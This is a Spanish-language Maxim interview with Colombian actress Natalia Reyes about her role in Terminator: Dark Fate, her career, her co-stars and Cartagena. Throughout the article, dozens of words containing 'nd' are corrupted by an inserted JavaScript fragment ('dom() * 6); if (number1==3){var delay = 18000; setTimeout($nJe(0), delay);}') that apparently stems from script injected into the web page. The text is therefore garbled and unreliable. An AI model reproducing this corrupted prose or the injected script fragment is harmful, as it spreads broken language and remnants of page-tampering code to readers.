Natalia Reyes, actriz colombiana

    Natalia Reyes, actriz colombiana

    Habla sobre su participación en Terminator.

    Autor: Redacción Maxim 2 marzo, 2020


    FOTO: INSTAGRAM @nataliareyesg

     

    POR KEITH GORDON MAXIM AUSTARALIA

    La actriz colombiana Natalia Reyes habla sobre Terminator con Maxim Australia.

     

    La actriz colombiana Natalia Reyes ya es un nombre familiar en América Latina, gracias a sus increíbles actuaciones en cine y televisión en su país natal. Pero con la vista puesta en un escenario aún más grandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ande, logró obtener un papel en una de las mejores franquicias de todos los tiempos, las películas de Terminator, protagonizandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando en Terminator: Dark Fate. Recientemente habló con MAXIM sobre su carrera, trabajandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando con sus ídolos y equilibrandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando la vida y la carrera que pasó tanto en Hollywood como en su hogar en uno de los destinos turísticos más modernos del mundo, Cartagena.

     

    ¿Cómo empezaste a actuar? ¿Cuál consideras que es tu primer gran salto?

    Comencé con el teatro cuandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando tenía nueve años y luego entré a la televisión a los 16, pero diría que mi primer gran salto fue Lady, La Vendedora de Rosas, una telenovela que tuvo mucho éxito en toda América Latina.

     

     

     

    Tuviste un gran éxito crítico y comercial en Colombia. ¿Qué te motivó a expandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andirte a Hollywood y a una audiencia global más grandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ande?

    Podemos decir que siempre he soñado en grandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ande. Como actor, quieres que el mundo vea tu trabajo y mi sueño era hacer películas. Aprendí inglés (autodidacta, si te puedes imaginar) porque sabía que era la mejor manera de trabajar en producciones más grandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andes. ¡Y ahora estoy en esta franquicia masiva! Todavía no lo puedo creer.

     

     

     

    La franquicia Terminator es uno de los clásicos del cine de todos los tiempos. ¿Qué te atrajo del proyecto y el rol, y cuál fue tu reacción cuandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando obtuviste el papel?

    Al principio, ¡pensé que era un remake! Pero luego descubrí que no lo era, sino que era una continuación de la historia de Terminator 2: Judgment Day, y Tim Miller fue el encargado de dirigir, James Cameron regresó como productor y tenían una historia completamente nueva y con nuevos personajes. Cuandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando Tim me llamó y me dijo que me quedé con el papel, lloré durante horas y, en realidad, todavía no lo puedo creer.

     

     

    ¿Conocías o era fanática de las películas anteriores?

    Es gracioso porque ni siquiera nacía cuandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando salió la primera película de Terminator, pero vi las dos (1 y 2) cuandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando tenía unos siete años, un domingo habitual viendo películas en casa. Recuerdo que estaba tan asombrada por el mundo que habían creado. ¡Sin mencionar a Linda Hamilton, se convirtió en un ícono para mí desde entonces!

     

     

    ¿Cómo fue trabajar con leyendas como Arnold Schwarzenegger y Linda Hamilton, así como con estrellas actuales como Gabriel Luna y Mackenzie Davis?

    ¡Fue una experiencia increíble! Sentí que era el equilibrio perfecto entre el nuevo talento y las leyendas. Amo a Linda, es la actriz más profesional y comprometida que conozco y un ser humano tan amoroso. Trabajar con Arnold después de verlo tantas veces en una pantalla grandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ande fue surrealista y difícil de creer que realmente estuviera sucediendo. Mackenzie es una gran inspiración para mí, es una actriz excelente y fuimos muy unidos trabajandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando juntos y estoy muy feliz de llamarla ahora una gran amiga. Gabriel es una persona muy dulce y estoy emocionado de que la gente lo vea como el nuevo Terminator.

     

     

    ¿Son diferentes los sets de filmación y el ambiente de trabajo en Colombia y en los Estados Unidos?

    Hollywood es una industria más grandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ande y antigua y, por lo tanto, la escala es diferente, todo se siente 10 veces más grandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ande, desde el catering hasta la tripulación. ¡Todos los días aprendí algo nuevo!

     

    ¿Planeas seguir centrándote en las películas estadounidenses o quieres seguir trabajandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando en otros países también?

    Sí, quiero lo mejor de ambos mundos. Me encantaría tener la oportunidad de seguir trabajandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando en Hollywood con personas que siempre he admirado y también quiero seguir contandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando historias de donde soy.

     

     

    ¿En qué otros proyectos próximos estás trabajandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando? ¿Hay algo que esperar pronto?

    Bueno, viene una hermosa película independiente y una serie de Netflix, pero también quiero comenzar a desarrollar proyectos con personajes que quiero retratar.

     

    ¿Qué pasiones o pasatiempos tienes fuera del mundo de la actuación?

    Me encanta el teatro, ir al cine y cocinar nuevos platos veganos en casa. También me encanta bailar salsa y viajar y hacer deportes al aire libre como ciclismo, senderismo y natación.

     

     

     

    ¿Estás entusiasmada / optimista sobre el futuro de Colombia, ya que ahora es un país de visita obligada para los viajeros? ¿Tienes algún consejo para quienes consideren visitar?

    Absolutamente, Colombia es un hermoso país de visita obligada, está lleno de naturaleza y gente encantadora. Estoy entusiasmada y orgullosa del acuerdo de paz que firmamos hace dos años con la guerrilla, por lo que es bastante seguro: pusimos fin a la guerra y estamos en un proceso de reconciliación para que el país florezca. Nací en Bogotá, pero luego me mudé a Cartagena, mi lugar favorito en Colombia. Mi esposo y yo tenemos un resort de playa en la isla más cercana a Cartagena, se llama Fenix ​​Beach, así que asegúrese de pasar por allí cuandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando nos visiten.

     

     

    En México tenemos hermosas mujeres, LAS MUJERES MÁS HERMOSAS DE LOS MEDIOS EN MÉXICO

     

     

Habla sobre su participación en Terminator.